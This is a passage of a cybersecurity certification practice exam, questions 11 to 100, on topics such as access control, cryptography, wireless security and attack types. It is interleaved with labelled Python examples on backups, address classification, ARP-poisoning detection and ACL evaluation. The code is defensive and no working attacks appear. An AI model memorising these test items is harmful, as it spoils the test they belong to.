- 11. What method should you choose to authenticate a remote workstation before it gains
- access to a local LAN?
- A. Router
- B. Proxy server
- C. VPN concentrator
- D. Firewall
- 12. Which of the following allows a company to store a cryptographic key with a trusted
- third party and release it only to the sender or receiver with proper authorization?
- A. CRL
- B. Key escrow
- C. Trust model
- D. Intermediate CA
- 13. Your company recently upgraded the HVAC system for its server room. Which of the following security implications would the company be most concerned about?
- A. Confidentiality
- B. Availability
- C. Integrity
- D. Airgap
- 14. Your company provides secure wireless Internet access to visitors and vendors working
- onsite. Some of the vendors are reporting they are unable to view the wireless network.
- Which of the following best describes the issue?
- A. MAC filtering is enabled on the WAP.
- B. The SSID broadcast is disabled.
- C. The wrong antenna type is being used.
- D. The wrong band selection is being used.
- 15. Your company’s sales team is working late at the end of the month to ensure all sales are
- reported for the month. The sales members notice they cannot save or print reports after
- regular hours. Which of the following general concepts is preventing the sales members
- from performing their job?
- A. Job rotation
- B. Time-of-day restrictions
- C. Least privilege
- D. Location-based policy
- 16. Which of the following symmetric algorithms are block ciphers? (Choose three.)
- A. 3DES
- B. ECDHE
- C. RSA
- D. RC4
- E. SHA
- F. Twofish
- 17. A security officer has asked you to use a password cracking tool on the company’s computers. Which of the following best describes what the security officer is trying to accomplish?
- A. Looking for strong passwords
- B. Enforcing a minimum password length policy
- C. Enforcing a password complexity policy
- D. Looking for weak passwords
- 18. Which of the following tests gives testers comprehensive network design information?
- A. White box
- B. Black box
- C. Gray box
- D. Purple box
- 19. You are the network administrator for your company and want to implement a wireless network and prevent unauthorized access. Which of the following would be the best option?
- A. RADIUS
- B. TACACS+
- C. Kerberos
- D. OAUTH
- 20. Why is input validation important to secure coding techniques? (Choose two.)
- A. It mitigates shoulder surfing.
- B. It mitigates buffer overflow attacks.
- C. It mitigates ARP poisoning.
- D. It mitigates XSS vulnerabilities.
- 21. To authenticate, a Windows 10 user draws a circle around a picture of a dog’s nose and
- then touches each ear starting with the right ear. Which of the following concepts is this
- describing?
- A. Something you do
- B. Something you know
- C. Something you have
- D. Somewhere you are
- 22. Which of the following countermeasures is designed to best protect against a brute-force
- password attack?
- A. Password complexity
- B. Account disablement
- C. Password length
- D. Account lockout
- 23. You are a security administrator reviewing the results from a network security audit. You
- are reviewing options to implement a solution to address the potential poisoning of name
- resolution server records. Which of the following would be the best choice?
- A. SSL
- B. SSH
- C. DNSSEC
- D. TLS
- 24. Your manager has implemented a new policy that requires employees to shred all sensitive
- documents. Which of the following attacks is your manager attempting to prevent?
- A. Tailgating
- B. Dumpster diving
- C. Shoulder surfing
- D. Man-in-the-middle
- 25. Which of the following cryptography algorithms support multiple bit strengths?
- A. DES
- B. HMAC
- C. MD5
- D. AES
- 26. A network security auditor will perform various simulated network attacks against your
- company’s network. Which should the security auditor acquire first?
- A. Vulnerability testing authorization
- B. Transfer risk response
- C. Penetration testing authorization
- D. Change management
- 27. A system administrator is told an application is not able to handle the large amount of traffic
- the server is receiving on a daily basis. The attack takes the server offline and causes it to drop
- packets occasionally. The system administrator needs to find another solution while keeping
- the application secure and available. Which of the following would be the best solution?
- A. Sandboxing
- B. DMZ
- C. Cloud computing
- D. DLP
- 28. You are a security administrator and are observing unusual behavior in your network from a workstation. The workstation is communicating with a known malicious destination over an encrypted tunnel. You have updated the antivirus definition files and performed a full antivirus scan. The scan doesn’t show any clues of infection. Which of the following best describes what has happened on the workstation?
- A. Buffer overflow
- B. Session hijacking
- C. Zero-day attack
- D. DDoS
- 29. You are the security engineer and have discovered that communication within your company’s encrypted wireless network is being captured with a sniffing program. The data being captured is then being decrypted to obtain the employee’s credentials to be used at a later time. Which of the following protocols is most likely being used on the wireless access point? (Choose two.)
- A. WPA2 Personal
- B. WPA2 Enterprise
- C. WPA
- D. WEP
- 30. A network manager has implemented a strategy so that all workstations on the network
- will receive required security updates regularly. Which of the following best describes
- what the network manager implemented?
- A. Sandboxing
- B. Ad hoc
- C. Virtualization
- D. Patch management
- 31. Your manager wants to secure the FTP server by using SSL. Which of the following
- should you configure?
- A. FTPS
- B. SFTP
- C. SSH
- D. LDAPS
- 32. You are an IT security officer and you want to classify and assess privacy risks throughout
- the development life cycle of a program or system. Which of the following tools would be
- best to use for this purpose?
- A. BIA
- B. PIA
- C. RTO
- D. MTBF
- 33. Which of the following types of risk analysis makes use of ALE?
- A. Qualitative
- B. ROI
- C. SLE
- D. Quantitative
- 34. Which of the following statements best describes mandatory vacations?
- A. Companies ensure their employees can take time off to conduct activities together.
- B. Companies use them as a tool to ensure employees are taking the correct amount of
- days off.
- C. Companies ensure their employees are properly recharged to perform their duties.
- D. Companies use them as a tool for security protection to detect fraud.
- 35. Users of your company have been visiting the website www.abccompany.com and a recent
- increase in virus detection has been noted. Your company has developed a relationship
- with another company using the web address www.abccompany.com, but not with the site
- that has been causing the increase of viruses. Which of the following would best describe
- this attack?
- A. Session hijacking
- B. Cross-site scripting
- C. Replay attack
- D. Typo squatting
- 36. Which of the following would you enable in a laptop’s BIOS to provide full disk
- encryption?
- A. RAID
- B. USB
- C. HSM
- D. TPM
- 37. Your company has hired a third-party auditing firm to conduct a penetration test against
- your network. The firm wasn’t given any information related to the company’s network.
- What type of test is the company performing?
- A. White box
- B. Red box
- C. Black box
- D. Gray box
- 38. Server room access is controlled with proximity cards and records all entries and exits. These records are referred to if missing equipment is discovered, so employees can be identified. Which of the following must be prevented for this policy to become effective?
- A. Shoulder surfing
- B. Tailgating
- C. Vishing
- D. Dumpster diving
- 39. Company users are stating they are unable to access the network file server. A company security administrator checks the router ACL and knows users can access the web server, email server, and printing services. Which of the following is preventing access to the network file server?
- A. Implicit deny
- B. Port security
- C. Flood guard
- D. Signal strength
- 40. An employee informs you that the Internet connection is slow and they are having difficulty accessing websites to perform their job. You analyze their computer and discover the MAC address of the default gateway in the ARP cache is not correct. What type of attack have you discovered?
- A. DNS poisoning
- B. Injection
- C. Impersonation
- D. ARP poisoning
- 41. Tony, a college student, downloaded a free word editor program to complete his essay. After downloading and installing the software, Tony noticed his computer was running slow and he was receiving notifications from his antivirus program. Which of the following best describes the malware that he installed?
- A. Keylogger
- B. Worm
- C. Ransomware
- D. Trojan
- 42. Which of the following measures the amount of time required to return a failed device,
- component, or network to normal functionality?
- A. RTO
- B. MTTR
- C. MTBF
- D. RPO
- 43. Natural disasters and intentional man-made attacks can cause the death of employees and
- customers. What type of impact is this?
- A. Safety
- B. Life
- C. Finance
- D. Reputation
- 44. A user finds and downloads an exploit that will take advantage of website vulnerabilities. The user isn’t knowledgeable about the exploit and runs the exploit against multiple websites to gain access. Which of the following best describes this user?
- A. Man-in-the-middle
- B. Script kiddie
- C. White hat
- D. Hacktivist
- 45. You are the IT security officer and you plan to develop a general cybersecurity awareness training program for the employees. Which of the following best describes these employees?
- A. Data owners
- B. Users
- C. System administrators
- D. System owners
- 46. The system administrator needs to secure the company’s data-at-rest. Which of the following would provide the strongest protection?
- A. Implement biometrics controls on each workstation.
- B. Implement full-disk encryption.
- C. Implement a host intrusion prevention system.
- D. Implement a host intrusion detection system.
- 47. Which of the following is a true statement about qualitative risk analysis?
- A. It uses numeric values to measure the impact of risk.
- B. It uses descriptions and words to measure the impact of risk.
- C. It uses industry best practices and records.
- D. It uses statistical theories, testing, and experiments.
- 48. Which of the following firewalls tracks the operating state and characteristics of network
- connections traversing it?
- A. Stateful firewall
- B. Stateless firewall
- C. Application firewall
- D. Packet filter firewall
- 49. Which of the following are examples of PII? (Choose two.)
- A. Fingerprint
- B. MAC address
- C. Home address
- D. Gender
- 50. An employee informs you they have lost a corporate mobile device. What is the first action
- you perform?
- A. Enable push notification services.
- B. Remotely wipe the mobile device.
- C. Enable screen lock.
- D. Enable geofencing.
- 51. You have created a backup routine that includes a full backup each Sunday night and a backup each night of all data that has changed since Sunday’s backup. Which of the following best describes this backup schedule?
- A. Full and incremental
- B. Full and differential
- C. Snapshots
- D. Full
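Question 51 turns on the difference between "changed since the last full backup" (differential) and "changed since the previous backup of any kind" (incremental). The following is an added example, not part of the practice test, that simulates both schedules over a constructed week of file changes and shows the trade-off a practitioner actually sees: differential sets grow but restore from two media, incremental sets stay small but restore needs the whole chain. The file names and nightly change pattern are invented for illustration.

```python
"""Full + differential versus full + incremental backup sets.

Added example, not from the practice test. A differential backup copies
everything changed since the last full backup, so each night's set grows
through the week and a restore needs only the full plus the newest
differential. An incremental copies only what changed since the previous
backup of any kind, so each set stays small but a restore needs the full
plus every incremental in order. File names and the nightly change
pattern are constructed for illustration.
"""
from typing import Dict, List, Set

# Constructed scenario: which files change on each night after the Sunday full.
NIGHTLY_CHANGES: Dict[str, Set[str]] = {
    "Mon": {"ledger.db"},
    "Tue": {"ledger.db", "payroll.xlsx"},
    "Wed": {"policies.docx"},
    "Thu": {"ledger.db"},
}


def differential_sets(changes: Dict[str, Set[str]]) -> Dict[str, Set[str]]:
    """Each night's differential = every file changed since the full backup."""
    since_full: Set[str] = set()
    out: Dict[str, Set[str]] = {}
    for day, changed in changes.items():
        since_full |= changed          # accumulates; the archive bit is never reset
        out[day] = set(since_full)
    return out


def incremental_sets(changes: Dict[str, Set[str]]) -> Dict[str, Set[str]]:
    """Each night's incremental = only files changed since the previous night."""
    return {day: set(changed) for day, changed in changes.items()}


def restore_media(scheme: str, changes: Dict[str, Set[str]], day: str) -> List[str]:
    """Backup media that must be read, in order, to recover the state as of `day`."""
    days = list(changes)
    if scheme == "differential":
        return ["full", f"diff-{day}"]
    if scheme == "incremental":
        return ["full"] + [f"inc-{d}" for d in days[: days.index(day) + 1]]
    raise ValueError(f"unknown scheme {scheme!r}")


def files_copied(sets: Dict[str, Set[str]]) -> int:
    """Total file copies written over the week: the storage/time cost side."""
    return sum(len(s) for s in sets.values())


if __name__ == "__main__":
    for scheme, fn in (("differential", differential_sets), ("incremental", incremental_sets)):
        sets = fn(NIGHTLY_CHANGES)
        print(scheme, {d: sorted(s) for d, s in sets.items()})
        print("  copies over the week:", files_copied(sets))
        print("  media to restore Thursday:", restore_media(scheme, NIGHTLY_CHANGES, "Thu"))
```

Thursday's differential holds three files and restores from two media; Thursday's incremental holds one file but the restore has to replay all four nights, and losing any one of those media breaks the chain.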
- 52. One of your colleagues attempted to ping a computer name and received the response of
- fe80::3281:80ea:b72b:0b55. What type of address did the colleague view?
- A. IPv6
- B. IPv4
- C. MAC address
- D. APIPA
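The reply in question 52 starts with fe80::, the IPv6 link-local prefix (fe80::/10). As an added example, not part of the practice test, the function below classifies a string into the four answer choices using the standard-library ipaddress module, and also handles the zone suffix (%eth0, %12) that hosts append to link-local addresses and the Cisco dotted MAC notation; the sample inputs in the usage are constructed.

```python
"""Classify an address string as IPv6 link-local, IPv6, APIPA, IPv4 or MAC.

Added example, not from the practice test. The ipaddress module marks
fe80::/10 (IPv6) and 169.254.0.0/16 (IPv4, the APIPA range a host assigns
itself when no DHCP server answers) as link-local; a MAC address is
matched by pattern because it is not an IP address at all.
"""
import ipaddress
import re

# Six hex octets separated by ':' or '-', or three 4-hex-digit groups
# separated by '.' (Cisco notation).
_MAC_RE = re.compile(
    r"^(?:[0-9A-Fa-f]{2}[:-]){5}[0-9A-Fa-f]{2}$|^(?:[0-9A-Fa-f]{4}\.){2}[0-9A-Fa-f]{4}$"
)


def classify_address(text: str) -> str:
    """Return 'IPv6 link-local', 'IPv6', 'APIPA', 'IPv4', 'MAC address' or 'unknown'."""
    token = text.strip()
    # Drop a zone index such as %eth0 or %12 that ping prints after a
    # link-local IPv6 address; it is not part of the address itself.
    bare = token.split("%", 1)[0]
    try:
        addr = ipaddress.ip_address(bare)
    except ValueError:
        addr = None
    if isinstance(addr, ipaddress.IPv6Address):
        return "IPv6 link-local" if addr.is_link_local else "IPv6"
    if isinstance(addr, ipaddress.IPv4Address):
        return "APIPA" if addr.is_link_local else "IPv4"
    if _MAC_RE.match(token):
        return "MAC address"
    return "unknown"


if __name__ == "__main__":
    # Constructed inputs, one per answer choice plus two edge cases.
    for sample in ("fe80::3281:80ea:b72b:0b55", "fe80::1%eth0", "2001:db8::1",
                   "169.254.10.20", "10.0.0.5", "00:1a:2b:3c:4d:5e", "001a.2b3c.4d5e"):
        print(f"{sample:28} -> {classify_address(sample)}")
```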
- 53. Which of the following defines the act of sending unsolicited messages to nearby Bluetooth devices?
- A. Jamming
- B. Bluesnarfing
- C. Brute force
- D. Bluejacking
- 54. You are a system administrator and you are creating a public and private key pair. You
- have to specify the key strength. Which of the following would be your best choice?
- A. RSA
- B. DES
- C. MD5
- D. SHA
- 55. You are the security administrator for the sales department and the department needs to
- email high volumes of sensitive information to clients to help close sales. All emails go
- through a DLP scanner. Which of the following is the best solution to help the department
- protect the sensitive information?
- A. Automatically encrypt outgoing emails.
- B. Monitor all outgoing emails.
- C. Automatically encrypt incoming emails.
- D. Monitor all incoming emails.
- 56. You are the IT security officer of your company and have established a security policy
- that requires users to protect all sensitive documents to avoid their being stolen. What
- policy have you implemented?
- A. Separation of duties
- B. Clean desk
- C. Job rotation
- D. Privacy
- 57. Which of the following options can a security administrator deploy on a mobile device that
- will deter undesirable people from seeing the data on the device if it is left unattended?
- A. Screen lock
- B. Push notification services
- C. Remote wipe
- D. Full device encryption
- 58. You are a system administrator and are asked to prevent staff members from using each
- other’s credentials to access secured areas of the building. Which of the following will best
- address this request?
- A. Install a biometric reader at the entrance of the secure area.
- B. Install a proximity card reader at the entrance of the secure area.
- C. Implement least privilege.
- D. Implement group policy enforcement.
- 59. A sales manager has asked for an option for sales reps who travel to have secure remote
- access to your company’s database server. Which of the following should you configure
- for the sales reps?
- A. VPN
- B. WLAN
- C. NAT
- D. Ad hoc
- 60. An attacker tricks one of your employees into clicking on a malicious link that causes an
- unwanted action on the website the employee is currently authenticated to. What type of
- attack is this?
- A. Replay
- B. Cross-site request forgery
- C. Cross-site scripting
- D. Buffer overflow
- 61. Which of the following is considered the strongest access control?
- A. RBAC
- B. DAC
- C. MAC
- D. ABAC
- 62. Your company wants to expand its data center, but has limited space to store additional
- hardware. The IT staff needs to continue their operations while expansion is underway.
- Which of the following would best accomplish this expansion idea?
- A. IaaS
- B. Virtualization
- C. SaaS
- D. Public cloud
- 63. Which of the following algorithms have known collisions? (Choose two.)
- A. MD5
- B. AES
- C. SHA
- D. SHA-256
- E. RSA
- 64. Which of the following must a security administrator implement to allow customers, vendors, suppliers, and other businesses to obtain information while preventing access to the company’s entire network?
- A. Intranet
- B. Internet
- C. Extranet
- D. Honeynet
- 65. The head of HR is conducting an exit interview with an IT network administrator named
- Matt. The interview questions include Matt’s view of his manager, why he is leaving his
- current position, and what he liked most about his job. Which of the following should
- also be addressed in this exit interview?
- A. Job rotation
- B. NDA
- C. Background checks
- D. Property return form
- 66. Which of the following is considered the least secure authentication method?
- A. TACACS+
- B. CHAP
- C. NTLM
- D. PAP
- 67. You are a security administrator for your company and have been asked to recommend a secure method for storing passwords due to recent brute-force attempts. Which of the following will provide the best protection? (Choose two.)
- A. ROT13
- B. BCRYPT
- C. RIPEMD
- D. PBKDF2
- 68. You installed a WAP for a local coffee shop and have discovered the signal is extending
- into the parking lot. Which of the following configurations will best correct this issue?
- A. Change the antenna type.
- B. Disable the SSID broadcast.
- C. Reduce the signal strength for indoor coverage only.
- D. Enable MAC filtering to prevent devices from accessing the wireless network.
- 69. You are a network administrator for a bank. A branch manager discovers that the deskside employees have the ability to delete lending policies found in a folder within the file server. You review the permissions and notice the deskside employees have “modify” permissions to the folder. The employees should have read permissions only. Which of the following security principles has been violated?
- A. Job rotation
- B. Time-of-day restrictions
- C. Separation of duties
- D. Least privilege
- 70. Which of the following concepts of cryptography ensures integrity of data by the use of
- digital signatures?
- A. Key stretching
- B. Steganography
- C. Key exchange
- D. Hashing
- 71. Your manager has asked you to recommend a public key infrastructure component to
- store certificates that are no longer valid. Which of the following is the best choice?
- A. Intermediate CA
- B. CSR
- C. CRL
- D. Key escrow
- 72. You are a backup operator and receive a call from a user asking you to send sensitive documents immediately because their manager is going to a meeting with the company’s executives. The user states the manager’s files are corrupted and he is attending the meeting in the next 5 minutes. Which of the following forms of social engineering best describes this situation?
- A. Scarcity
- B. Consensus
- C. Intimidation
- D. Authority
- 73. Which of the following controls can you implement together to prevent data loss if a
- mobile device is lost or stolen? (Choose two.)
- A. Geofencing
- B. Full-device encryption
- C. Screen locks
- D. Push notification services
- 74. You are asked to find the MAC address on a Linux machine. Which of the following
- commands can you use to discover it?
- A. ipconfig
- B. ifconfig
- C. tracert
- D. ping
- 75. A chief security officer (CSO) notices that a large number of contractors work for the company. When a contractor leaves the company, the provisioning team is not notified. The CSO wants to ensure the contractors cannot access the network when they leave. Which of the following policies best supports the CSO’s plan?
- A. Account disablement
- B. Account lockout policy
- C. Enforce password history
- D. Account expiration policy
- 76. The CISO wants to strengthen the password policy by adding special characters to users’ passwords. Which of the following controls best achieves this goal?
- A. Password complexity
- B. Password length
- C. Password history
- D. Group policy
- 77. Which of the following deployment models allows a business to have more control of the
- devices given to employees that handle company information?
- A. DLP
- B. COPE
- C. BYOD
- D. CYOD
- 78. A network administrator uses their fingerprint and enters a PIN to log onto a server.
- Which of the following best describes this example?
- A. Identification
- B. Single authentication
- C. Multifactor authentication
- D. Transitive trust
- 79. Your company wants to perform a privacy threshold assessment (PTA) to identify all PII residing in its systems before retiring hardware. Which of the following would be examples of PII? (Choose two.)
- A. Date of birth
- B. Email address
- C. Race
- D. Fingerprint
- 80. Your HIPS is incorrectly reporting legitimate network traffic as suspicious activity. What
- is this best known as?
- A. False positive
- B. False negative
- C. Credentialed
- D. Noncredentialed
- 81. Matt, a network administrator, is asking how to configure the switches and routers to securely monitor their status. Which of the following protocols would he need to implement on the devices?
- A. SSH
- B. SNMP
- C. SMTP
- D. SNMPv3
- 82. Your company has issued a hardware token-based authentication to administrators to
- reduce the risk of password compromise. The tokens display a code that automatically
- changes every 30 seconds. Which of the following best describes this authentication
- mechanism?
- A. TOTP
- B. HOTP
- C. Smartcard
- D. Proximity card
- 83. You are the network administrator for your company’s Microsoft network. Your CISO is
- planning the network security and wants a secure protocol that will authenticate all users
- logging into the network. Which of the following authentication protocols would be the
- best choice?
- A. RADIUS
- B. TACACS+
- C. Kerberos
- D. SAML
- 84. Which of the following is not a vulnerability of end-of-life systems?
- A. When systems can’t be updated, firewalls and antiviruses are not sufficient
- protection.
- B. Out-of-date systems can result in fines in regulated industries.
- C. When an out-of-date system reaches the end-of-life, it will automatically shut down.
- D. Operating out-of-date systems can result in poor performance and reliability and can
- lead to denial of services.
- 85. Which of the following statements are true regarding viruses and worms? (Choose two.)
- A. A virus is a malware that self-replicates over the network.
- B. A worm is a malware that self-replicates over the network.
- C. A virus is a malware that replicates by attaching itself to a file.
- D. A worm is a malware that replicates by attaching itself to a file.
- 86. Which of the following wireless attacks would be used to impersonate another WAP to
- obtain unauthorized information from nearby mobile users?
- A. Rogue access point
- B. Evil twin
- C. Bluejacking
- D. Bluesnarfing
- 87. Tony, a security administrator, discovered through an audit that all the company’s access
- points are currently configured to use WPA with TKIP for encryption. Tony needs to
- improve the encryption on the access points. Which of the following would be the best
- option for Tony?
- A. WPA2 with CCMP
- B. WEP
- C. WPA with CCMP
- D. WPS
- 88. Your department manager assigns Tony, a network administrator, the job of expressing
- the business and financial effects that a failed SQL server would cause if it was down for
- 4 hours. What type of analysis must Tony perform?
- A. Security audit
- B. Asset identification
- C. Business impact analysis
- D. Disaster recovery plan
- 89. You are the security administrator for a local hospital. The doctors want to prevent the
- data from being altered while working on their mobile devices. Which of the following
- would most likely accomplish the request?
- A. Cloud storage
- B. Wiping
- C. SIEM
- D. SCADA
- 90. You are a Unix engineer, and on October 29 you discovered that a former employee had
- planted malicious code that would destroy 4,000 servers at your company. This mali-
- cious code would have caused millions of dollars worth of damage and shut down your
- company for at least a week. The malware was set to detonate at 9:00 a.m. on January 31.
- What type of malware did you discover?
- A. Logic bomb
- B. RAT
- C. Spyware
- D. Ransomware
- 91. Which of the following is defined as hacking into a computer system for a politically or
- socially motivated purpose?
- A. Hacktivist
- B. Insider
- C. Script kiddie
- D. Evil twin
- 92. A network administrator with your company has received phone calls from an individual who is requesting information about their personal finances. Which of the following types of attack is occurring?
- A. Whaling
- B. Phishing
- C. Vishing
- D. Spear phishing
- 93. Which of the following can be restricted on a mobile device to prevent security violations?
- (Choose three.)
- A. Third-party app stores
- B. Biometrics
- C. Content management
- D. Rooting
- E. Sideloading
- 94. Which of the following does a remote access VPN usually rely on? (Choose two.)
- A. IPSec
- B. DES
- C. SSL
- D. SFTP
- 95. Matt, a security administrator, wants to use a two-way trust model for the owner of a certificate and the entity relying on the certificate. Which of the following is the best option to use?
- A. WPA
- B. Object identifiers
- C. PFX
- D. PKI
- 96. If domain A trusts domain B, and domain B trusts domain C, then domain A trusts
- domain C. Which concept does this describe?
- A. Multifactor authentication
- B. Federation
- C. Single sign-on
- D. Transitive trust
- 97. A user entered a username and password to log into the company’s network. Which of the
- following best describes the username?
- A. Authorization
- B. Authentication
- C. Identification
- D. Accounting
- 98. Which of the following tools can be used to hide messages within a file?
- A. Data sanitization
- B. Steganography
- C. Tracert
- D. Network mapping
- 99. Which of the following is best used to prevent ARP poisoning on a local network?
- (Choose two.)
- A. Antivirus
- B. Static ARP entries
- C. Patching management
- D. Port security
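Questions 40 and 99 are two sides of the same problem: question 40's symptom is a gateway entry in the ARP cache carrying the wrong MAC, and question 99's static ARP entry is the host-side fix (port security, the other correct choice, is configured on the switch and is not shown here). The following is an added example, not part of the practice test, that parses constructed `ip neigh show` output, flags the mismatched gateway and the single MAC answering for several IPs, and emits the Linux command that pins the entry. The interface name eth0 and all addresses are assumptions.

```python
"""Detect a poisoned ARP cache entry and show the static-entry defence.

Added example, not from the practice test, for questions 40 and 99.
check_arp_cache() reports (a) any known-good IP whose cached MAC differs
and (b) any MAC that several IPs resolve to, the usual footprint of an
attacker answering ARP for other hosts. static_entry_commands() prints
the `ip neigh` command that makes the mapping permanent so a spoofed
reply cannot overwrite it (Windows equivalent: netsh interface ipv4 add
neighbors, or the older arp -s).
"""
import re
from typing import Dict, List

# Known-good mapping the administrator recorded on a clean network (constructed).
KNOWN_GOOD = {"192.168.1.1": "00:11:22:33:44:55"}
INTERFACE = "eth0"   # assumption

# Constructed `ip neigh show` output from the slow workstation: the gateway now
# resolves to the same MAC as 192.168.1.50, the attacker's host.
SAMPLE_IP_NEIGH = """\
192.168.1.1 dev eth0 lladdr aa:bb:cc:dd:ee:ff REACHABLE
192.168.1.50 dev eth0 lladdr aa:bb:cc:dd:ee:ff STALE
192.168.1.20 dev eth0 lladdr 00:aa:bb:cc:dd:20 REACHABLE
192.168.1.77 dev eth0 FAILED
"""

_LINE_RE = re.compile(r"^(\S+) dev (\S+) lladdr ([0-9a-f:]{17}) (\w+)$", re.I)


def parse_ip_neigh(text: str) -> Dict[str, str]:
    """Map IP -> lowercase MAC; entries without an lladdr (FAILED/INCOMPLETE) are skipped."""
    table: Dict[str, str] = {}
    for line in text.splitlines():
        m = _LINE_RE.match(line.strip())
        if m:
            table[m.group(1)] = m.group(3).lower()
    return table


def check_arp_cache(table: Dict[str, str], known_good: Dict[str, str]) -> List[str]:
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings: List[str] = []
    for ip, mac in known_good.items():
        seen = table.get(ip)
        if seen and seen != mac.lower():
            findings.append(f"{ip} resolves to {seen}, expected {mac.lower()}")
    by_mac: Dict[str, List[str]] = {}
    for ip, mac in table.items():
        by_mac.setdefault(mac, []).append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(f"{mac} claimed by {', '.join(sorted(ips))}")
    return findings


def static_entry_commands(known_good: Dict[str, str], dev: str = INTERFACE) -> List[str]:
    """Linux commands that pin each known-good mapping as a permanent neighbour entry."""
    return [f"ip neigh replace {ip} lladdr {mac} dev {dev} nud permanent"
            for ip, mac in known_good.items()]


if __name__ == "__main__":
    cache = parse_ip_neigh(SAMPLE_IP_NEIGH)
    for finding in check_arp_cache(cache, KNOWN_GOOD) or ["no ARP anomalies"]:
        print("FINDING:", finding)
    print("remediation:")
    for cmd in static_entry_commands(KNOWN_GOOD):
        print("  ", cmd)
```

A permanent entry protects only the host it is set on and has to be maintained when the gateway's hardware changes, which is why it is paired with switch-side controls in practice.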
- 100. Which of the following is the best practice to place at the end of an ACL?
- A. USB blocking
- B. Time synchronization
- C. MAC filtering
- D. Implicit deny
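Questions 39 and 100 both rest on how a router ACL is evaluated: top down, first match wins, and anything no rule mentions is dropped by the implicit deny at the end. The following is an added example, not part of the practice test, with a small first-match evaluator and a constructed ACL mirroring question 39: web, mail and print traffic is permitted, no rule mentions the file server, so SMB to it is denied without any rule saying so. Appending the deny-any explicitly (question 100) changes nothing about what is dropped but makes the drop visible. Addresses, ports and the rule syntax are this example's assumptions, not any vendor's.

```python
"""First-match ACL evaluation with the implicit deny at the end.

Added example, not from the practice test, for questions 39 and 100.
evaluate() walks the rules in order and returns the action of the first
match; if nothing matches it returns the implicit deny and says so, which
is exactly the condition the administrator in question 39 is looking at.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Rule:
    action: str            # "permit" or "deny"
    proto: str             # "tcp", "udp" or "any"
    dst: str               # destination network in CIDR notation
    dport: Optional[int]   # destination port, None = any port

    def matches(self, proto: str, dst_ip: str, dport: int) -> bool:
        return ((self.proto == "any" or self.proto == proto)
                and ip_address(dst_ip) in ip_network(self.dst)
                and (self.dport is None or self.dport == dport))


# Constructed ACL: only what the administrator wrote. Nothing permits TCP 445
# (SMB) to the file server at 10.0.0.40 (assumed address).
ACL: List[Rule] = [
    Rule("permit", "tcp", "10.0.0.10/32", 80),    # web server, HTTP
    Rule("permit", "tcp", "10.0.0.10/32", 443),   # web server, HTTPS
    Rule("permit", "tcp", "10.0.0.20/32", 25),    # email server, SMTP
    Rule("permit", "tcp", "10.0.0.30/32", 631),   # print server, IPP
    Rule("deny",   "any", "10.0.0.99/32", None),  # an explicit deny, for contrast
]

IMPLICIT_DENY = Rule("deny", "any", "0.0.0.0/0", None)   # never written, always last


def evaluate(acl: List[Rule], proto: str, dst_ip: str, dport: int) -> Tuple[str, str]:
    """Return (action, reason); reason names the matching rule or 'implicit deny'."""
    for i, rule in enumerate(acl):
        if rule.matches(proto, dst_ip, dport):
            return rule.action, f"rule {i + 1}: {rule.action} {rule.proto} {rule.dst} {rule.dport or 'any'}"
    return IMPLICIT_DENY.action, "implicit deny"


def make_explicit(acl: List[Rule]) -> List[Rule]:
    """Question 100's best practice: end the ACL with a written deny-any so the
    drop shows up as a numbered rule (and can be logged on most platforms)."""
    return list(acl) + [IMPLICIT_DENY]


if __name__ == "__main__":
    flows = [("tcp", "10.0.0.10", 443), ("tcp", "10.0.0.20", 25),
             ("tcp", "10.0.0.40", 445), ("tcp", "10.0.0.99", 80)]
    for name, acl in (("as written", ACL), ("with explicit deny", make_explicit(ACL))):
        print(name)
        for proto, ip, port in flows:
            action, reason = evaluate(acl, proto, ip, port)
            print(f"  {proto} {ip}:{port:<4} -> {action:6} ({reason})")
```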